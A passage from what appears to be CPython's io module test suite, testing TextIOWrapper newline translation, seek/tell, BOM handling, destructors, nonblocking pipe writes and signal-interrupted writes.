self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(True)),
("", testdata.decode("ascii").splitlines(True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
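        # testdict maps the newline argument used for writing to the raw bytes
        # expected in the buffer; the None case below reuses the os.linesep
        # entry because newline=None translates '\n' to the platform default
        # on output.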
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
@unittest.skipIf(sys.platform == 'cli', 'Bad behaviour in ironpython')
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super(MyTextIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyTextIO, self).close()
def flush(self):
record.append(3)
super(MyTextIO, self).flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
            for enc in "ascii", "latin1", "utf8":  # , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(IOError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
f = self.open(support.TESTFN, "wb")
f.write(line*2)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
s = f.read(prefix_size)
self.assertEqual(s, prefix.decode("ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
f = self.open(support.TESTFN, "wb")
f.write(data)
f.close()
f = self.open(support.TESTFN, "r", encoding="utf-8")
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
        # Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(IOError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises((AttributeError, TypeError)):
txt.buffer = buf
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(NonbytesStream('a'))
self.assertEqual(t.read(), u'a')
def test_illegal_encoder(self):
# bpo-31271: A TypeError should be raised in case the return value of
# encoder's encode() is invalid.
class BadEncoder:
def encode(self, dummy):
return u'spam'
def get_bad_encoder(dummy):
return BadEncoder()
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True), \
support.swap_attr(rot13, 'incrementalencoder', get_bad_encoder):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
with self.assertRaises(TypeError):
t.write('bar')
t.flush()
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri_codec")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri_codec")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read(1)
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.readline()
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read()
#else:
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.read, 1)
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.readline)
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri_codec")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
with self.maybeRaises(TypeError):
t.read(42)
t = _make_very_illegal_wrapper(())
with self.maybeRaises(TypeError):
t.read(42)
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
maybeRaises = unittest.TestCase.assertRaises
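    # The C implementation is expected to actually raise in the illegal
    # encoder/decoder tests, so maybeRaises is plain assertRaises here; the
    # pure-Python subclass below substitutes a no-op context manager since
    # _pyio does not necessarily raise in the same places.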
class PyTextIOWrapperTest(TextIOWrapperTest):
@contextlib.contextmanager
def maybeRaises(self, *args, **kwds):
yield
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(b))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(unicode):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
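        # Illustration (not part of the original test): with bufsize=1024
        # (<= PIPE_BUF) each raw write of the buffer is all-or-nothing, so a
        # BlockingIOError implies characters_written == 0; with bufsize=16*1024
        # a raw write may be cut short and characters_written can be non-zero,
        # which is why sent[-1] is truncated below.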
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
class PyMiscIOTest(MiscIOTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 // 0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
try:
with self.assertRaises(ZeroDivisionError):
wio.write(item * (support.PIPE_MAX_SIZE // len(item) + 1))
finally:
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1//0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
